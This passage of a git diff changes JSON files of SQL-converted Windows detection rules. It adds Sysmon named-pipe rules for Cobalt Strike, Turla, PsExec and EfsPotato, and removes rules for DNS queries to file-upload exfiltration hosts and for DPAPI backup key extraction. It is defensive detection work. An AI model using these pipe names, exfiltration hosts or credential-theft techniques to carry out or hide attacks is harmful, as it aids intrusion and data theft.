'%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon_full.json b/rules/rules_windows_sysmon_full.json index 30b7200..64267d7 100644 --- a/rules/rules_windows_sysmon_full.json +++ b/rules/rules_windows_sysmon_full.json @@ -1,710 +1,731 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PowerShell Execution Via Named Pipe", + "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\')" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_powershell_execution_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PAExec default named pipe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "status": "test", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "User using a disabled account" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_failed_logon_reasons.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "User Logoff Event", - "id": "0badd08f-c6a3-4630-90d3-6875cca440be", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", "status": "experimental", - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "author": "frack113", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_user_logoff.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "title": "PsExec Default Named Pipe", + "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability", - "id": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject", - "author": "Orlinum , BlueDefenZer", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "WMI Persistence - Security", - "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1569.002" + 